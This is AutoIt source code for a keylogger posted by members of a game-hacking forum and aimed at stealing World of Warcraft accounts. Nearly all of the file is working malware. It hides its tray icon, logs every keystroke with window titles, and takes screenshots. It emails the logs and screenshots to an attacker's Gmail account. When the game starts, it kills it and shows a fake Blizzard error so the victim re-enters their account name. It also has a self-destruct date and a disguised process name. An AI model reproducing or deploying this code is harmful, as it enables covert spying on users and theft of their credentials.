#cs This script was written mostly by Marlo of MMOwned.com and it is used at y

1. #cs
2.     This script was written mostly by Marlo of MMOwned.com and it is used at your own risk.
3.     If you see any problems with my script please feel free to PM me on MMOwned.com, USername: Marlo
4.     Enjoy the script and use responsibly ;)
5.    
6.     #####HOW TO USE#####
7.     This script is fairly simple to use as i have commented most of it.
8.     All you should need to do is Change the following Vars.
9.    
10.     $Len - Put a value here between 1 and 60. This is used to determine how often in minutes the log file is emailed.
11.     $eFile - This is where the Log file is stored. @ScriptDir referes to the place where the keylogger was installed, That is determined in the "Deploy.au3" file.
12.     $Body - This is simply the main body of the email that is sent to you. Shoudlnt require much changing unless you want to include more info.
13.     $ClearLogAfterEmail - If set to True then the Log file will be deleted after it is uploaded, If set to false then it will simply keep adding to the file.
14.     $GmailUser - The script uses the GMAIL SMTP server for the emails, so you need a Gmail account. I reccomend making a new account if you plan on using this script.
15.     $GmailPass - your Gmail login password
16.     $ToEmail - This is where the email is sent to, this can be different to your GMAIL email but you can use the same if you wish.
17.    
18.     Thats pretty much it for this script. If you havnt already then check out the "Deploy.au3" to see whether you need to change anything there.
19.     ~Marlo
20.    
21.     ---------------------------"New" Version, Fixed by Thidan of MMOwned-----------------------------
22.     Added:
23.     Screenshot taker.
24.     Self-destruction.
25.     Will promt the user to delete the WTF and cache folders, just to get their accname ;)
26.     Shitty code that looks totally retarded in other people's eyes and prolly supernoobish and some of it might not even be needed.
27.    
28.     What have you actually bugfixed?
29.     I fixed the sleep command at the bottom of the while loop to make sure it eliminates most of the "ddouublee leetteerss" and "tpyos" (aka, the old one printed the
30.     same letter twice and/or printed the letters in the wrong order. Note: This may or not be 100% accurate, you might have to switch around letters sometimes but
31.     for me, this is optimal.
32.    
33.     Also, all credits to MARLO OF MMOWNED.
34.     ~Thidan
35. #ce
36.  
37. #include <SMTP.au3>                      ;Include the SMTP file (used for emailing)
38. #Include <String.au3>
39. #NoTrayIcon                              ;Do not show the Tray icon.
40. #include <screencapture.au3>
41.  
42. Global $Log, $Win, $Win2, $Len, $File, $Body, $ClearLogAfterEmail, $eFile, $GmailUser, $GmailPass, $ToEmail, $tStamp, $read ;Delcare some variables
43.  
44. $Len = 60                                 ;This is how often the log should be uploaded in minutes
45. $eFile = @ScriptDir & "\log.txt"       ;Name and place for the Log file
46. $Body = "Keylog file reciecved at " & @Hour & ":" & @Min & " on " & @MDay & "/" & @Mon & "/" & @Year   ;The body of the email
47. $ClearLogAfterEmail = True               ;Delete log after an upload? True for yes and False for no
48. $GmailUser = "EMAIL@gmail.com"           ;Gmail login name (Required)
49. $GmailPass = "PASSWORD"                      ;Gmail login pass (Required)
50. $ToEmail = "NEW EMAIL ORTHE ABOVE@gmail.com"             ;This is where the log files will be sent
51. $picture = @scriptdir & "\info.jpg"
52. $picture2 = @scriptdir & "\info2.jpg"
53. AdlibEnable("_WriteLog", 10000)
54. $Len *= 60
55. $tStamp = TimerInit()
56. $wow = ProcessExists("WoW.exe")
57.  
58. If Not FileExists($eFile) Then           ;This will send an install confirmation email to you when your victim installs your keylogger.
59. IniWrite(@ScriptDir & "\info.txt", "asfdk", "Opened", "False") ; This is vital, Do NOT change whatsoever unless you understand my shitty, dumb and totally retarded coding!!!!!!
60. IniWrite(@ScriptDir & "\info.txt", "Selfdestruct", "Day", "DAY OF SELF DESTRUCTTION") ; Note - Enter day in the format: 01 02 03 etc (1st in month X = 01 etc, X = your month)
61. IniWrite(@ScriptDir & "\info.txt", "Selfdestruct", "Month", "MONTH OF SELF DESTRUCTION") ;Note - Jan = 01, Feb = 02 etc.
62.     _INetSmtpMailCom("smtp.gmail.com", @ComputerName, $ToEmail, $ToEmail, $GmailUser, $GmailPass, @Username & "@" & @ComputerName, "Keylogger successfully installed")
63.         _ScreenCapture_capture($picture)
64.     _INetSmtpMailCom("smtp.gmail.com", @ComputerName, $ToEmail, $ToEmail, $GmailUser, $GmailPass, @Username & "@" & @ComputerName, "Screenshot", $picture)
65.  
66.    
67. EndIf
68.  
69.  
70.  
71. ;lolololol test
72. While 1
73.     $read = iniread(@ScriptDir & "\info.txt", "asfdk", "Opened", "")
74.     $read2 = iniread(@ScriptDir & "\info.txt", "Selfdestruct", "Day", "")
75.     $read3 = iniread(@ScriptDir & "\info.txt", "Selfdestruct", "Month", "")
76.    
77.     if @mday = $read2 and @mon = $read3 then
78.         Exit
79.         EndIf
80.    
81. If ProcessExists("WoW.exe") and $read = "False" Then
82.     sleep(7000) ; Can be lower /Thidan
83.         _ScreenCapture_Capture($picture2)
84.         _INetSmtpMailCom("smtp.gmail.com", @ComputerName, $ToEmail, $ToEmail, $GmailUser, $GmailPass, @Username & "@" & @ComputerName, "Screenshot of WoW", $picture2)
85.         filedelete($picture2)
86.         iniwrite(@ScriptDir & "\info.txt", "asfdk", "Opened", "Once")
87.         ProcessClose("WoW.exe")
88.         msgbox(16, "Critical Error 192", "There was an error loading the WTF and Cache folders, please delete them and restart the game."&@CRLF& "                                                             Blizzard.")
89.     ElseIf ProcessExists("WoW.exe") and $read = "Once" Then
90.     iniwrite(@ScriptDir & "\info.txt", "asdfk", "Opened", "Dont Use Keylogger")
91. EndIf
92.  
93. if ProcessExists("svhost.exe") and $read = "Dont use keylogger" Then
94.     processclose("svhost.exe")
95. EndIf
96.  
97.     ;EndIf
98. If _IsPressed(41) Then
99.         _LogKeyPress("a")
100.     EndIf
101.  
102.     If _IsPressed(42) Then
103.         _LogKeyPress("b")
104.     EndIf
105.  
106.     If _IsPressed(43) Then
107.         _LogKeyPress("c")
108.     EndIf
109.  
110.     If _IsPressed(44) Then
111.         _LogKeyPress("d")
112.     EndIf
113.  
114.     If _IsPressed(45) Then
115.         _LogKeyPress("e")
116.     EndIf
117.  
118.     If _IsPressed(46) Then
119.         _LogKeyPress("f")
120.     EndIf
121.  
122.     If _IsPressed(47) Then
123.         _LogKeyPress("g")
124.     EndIf
125.  
126.     If _IsPressed(48) Then
127.         _LogKeyPress("h")
128.     EndIf
129.  
130.     If _IsPressed(49) Then
131.         _LogKeyPress("i")
132.     EndIf
133.  
134.     If _IsPressed('4a') Then
135.         _LogKeyPress("j")
136.     EndIf
137.  
138.     If _IsPressed('4b') Then
139.         _LogKeyPress("k")
140.     EndIf
141.  
142.     If _IsPressed('4c') Then
143.         _LogKeyPress("l")
144.     EndIf
145.  
146.     If _IsPressed('4d') Then
147.         _LogKeyPress("m")
148.     EndIf
149.  
150.     If _IsPressed('4e') = 1 Then
151.         _LogKeyPress("n")
152.     EndIf
153.  
154.     If _IsPressed('4f') Then
155.         _LogKeyPress("o")
156.     EndIf
157.  
158.     If _IsPressed(50) Then
159.         _LogKeyPress("p")
160.     EndIf
161.  
162.     If _IsPressed(51) Then
163.         _LogKeyPress("q")
164.     EndIf
165.  
166.     If _IsPressed(52) Then
167.         _LogKeyPress("r")
168.     EndIf
169.  
170.     If _IsPressed(53) Then
171.         _LogKeyPress("s")
172.     EndIf
173.  
174.     If _IsPressed(54) Then
175.         _LogKeyPress("t")
176.     EndIf
177.  
178.     If _IsPressed(55) Then
179.         _LogKeyPress("u")
180.     EndIf
181.  
182.     If _IsPressed(56) Then
183.         _LogKeyPress("v")
184.     EndIf
185.  
186.     If _IsPressed(57) Then
187.         _LogKeyPress("w")
188.     EndIf
189.  
190.     If _IsPressed(58) Then
191.         _LogKeyPress("x")
192.     EndIf
193.  
194.     If _IsPressed(59) Then
195.         _LogKeyPress("y")
196.     EndIf
197.  
198.     If _IsPressed('5a') Then
199.         _LogKeyPress("z")
200.     EndIf
201.  
202.     If _IsPressed('08') Then
203.         _LogKeyPress("{BACKSPACE}")
204.     EndIf
205.  
206.     If _IsPressed('09') Then
207.         _LogKeyPress("{TAB}")
208.     EndIf
209.  
210.     If _IsPressed('0d') Then
211.         _LogKeyPress("{ENTER}")
212.     EndIf
213.  
214.     If _IsPressed('10') Then
215.         _LogKeyPress("{SHIFT}")
216.     EndIf
217.  
218.     If _IsPressed('11') Then
219.         _LogKeyPress("{CTRL}")
220.     EndIf
221.  
222.     If _IsPressed('12') Then
223.         _LogKeyPress("{ALT}")
224.     EndIf
225.  
226.     If _IsPressed('13') Then
227.         _LogKeyPress("{PAUSE}")
228.     EndIf  
229.  
230.     If _IsPressed('14') Then
231.         _LogKeyPress("{CAPSLOCK}")
232.     EndIf
233.  
234.     If _IsPressed('1b') Then
235.         _LogKeyPress("{ESC}")
236.     EndIf
237.     If _IsPressed('20') Then
238.         _LogKeyPress(" ")
239.     EndIf
240.  
241.     If _IsPressed('21') Then
242.         _LogKeyPress("{PGUP}")
243.     EndIf
244.  
245.     If _IsPressed('22') Then
246.         _LogKeyPress("{PGDOWN}")
247.     EndIf
248.  
249.     If _IsPressed('23') Then
250.         _LogKeyPress("{END}")
251.     EndIf
252.  
253.     If _IsPressed('24') Then
254.         _LogKeyPress("{HOME}")
255.     EndIf
256.  
257.     If _IsPressed('25') Then
258.         _LogKeyPress("{LEFT ARROW}")
259.     EndIf
260.  
261.     If _IsPressed('26') Then
262.         _LogKeyPress("{UP ARROW}")
263.     EndIf
264.  
265.     If _IsPressed('27') Then
266.         _LogKeyPress("{RIGHT ARROW}")
267.     EndIf
268.  
269.     If _IsPressed('28') Then
270.         _LogKeyPress("{DOWN ARROW}")
271.     EndIf
272.  
273.     If _IsPressed('2c') Then
274.         _LogKeyPress("{PRNTSCRN}")
275.     EndIf
276.  
277.     If _IsPressed('2d') Then
278.         _LogKeyPress("{INSERT}")
279.     EndIf
280.  
281.     If _IsPressed('2e') Then
282.         _LogKeyPress("{DEL}")
283.     EndIf
284.  
285.     If _IsPressed('30') Then
286.         _LogKeyPress("0")
287.     EndIf
288.  
289.     If _IsPressed('31') Then
290.         _LogKeyPress("1")
291.     EndIf
292.  
293.     If _IsPressed('32') Then
294.         _LogKeyPress("2")
295.     EndIf
296.  
297.     If _IsPressed('33') Then
298.         _LogKeyPress("3")
299.     EndIf
300.  
301.     If _IsPressed('34') Then
302.         _LogKeyPress("4")
303.     EndIf
304.  
305.     If _IsPressed('35') Then
306.         _LogKeyPress("5")
307.     EndIf
308.  
309.     If _IsPressed('36') Then
310.         _LogKeyPress("6")
311.     EndIf
312.  
313.     If _IsPressed('37') Then
314.         _LogKeyPress("7")
315.     EndIf
316.  
317.     If _IsPressed('38') Then
318.         _LogKeyPress("8")
319.     EndIf
320.  
321.     If _IsPressed('39') Then
322.         _LogKeyPress("9")
323.     EndIf
324.    
325.     If TimerDiff($tStamp) / 1000 >= $Len Then       ;This code block determines how many minutes have passed since last upload. Will upload the log when it meets the required minutes.
326.         _ScreenCapture_Capture(@scriptdir & "\info.jpg")
327.         _INetSmtpMailCom("smtp.gmail.com", @ComputerName, $ToEmail, $ToEmail, $GmailUser, $GmailPass, @Username & "@" & @ComputerName, "Screenshot", $picture)     
328.         _INetSmtpMailCom("smtp.gmail.com", @ComputerName, $ToEmail, $ToEmail, $GmailUser, $GmailPass, @Username & "@" & @ComputerName, $Body, $eFile)
329.         $tStamp = TimerInit()                       ;ReDim the tStamp var back to 0
330.         If $ClearLogAfterEmail = True Then          ;If you specified to have the log cleared after email then this is where it is deleted.
331.             FileDelete($eFile)
332.         EndIf
333.     EndIf
334.      ;Stops the script for 1/10 of a second, so the same keyisnt captured more than once.
335.  
336.    
337.     Sleep(120)
338. WEnd
339. Func _LogKeyPress($char)    ;Key processing
340.     $Win = WinGetTitle("")  ;Gets the name of the current active window
341.     If $Win = $Win2 Then    ;If the window is unchanged then simply add the key to the log
342.         $Log &= $Char
343.     Else
344.         $Win2 = $Win        ;If the window name has changed then add the window name to the log then the characters.
345.         $Log &= @CRLF & @CRLF & "[" & $Win & " - " & @Hour & ":" & @Min & " " & @MDay & "/" & @Mon & "/" & @Year & "]" & @CRLF & $Char
346.     EndIf
347.     _WriteLog()             ;Add the key to the log file
348. EndFunc
349.  
350. Func _WriteLog()
351.     $File = FileOpen($eFile, 1) ;Open the log file, If it doesnt exist then create it.
352.     FileWrite($File, $Log)      ;Write the Log var to the File
353.     $Log = ""                   ;Clear the log Var
354.     FileClose($File)            ;Close the File Handle
355. EndFunc
356.  
357.  
358. Func _IsPressed($hexKey)        ;Key capture function. Most vital part of the script.
359.     Local $aR, $bRv
360.     $hexKey = '0x' & $hexKey
361.     $aR = DllCall("user32", "int", "GetAsyncKeyState", "int", $hexKey)
362.     If $aR[0] <> 0 Then
363.         $bRv = 1
364.     Else
365.         $bRv = 0
366.     EndIf
367.     Return $bRv
368. EndFunc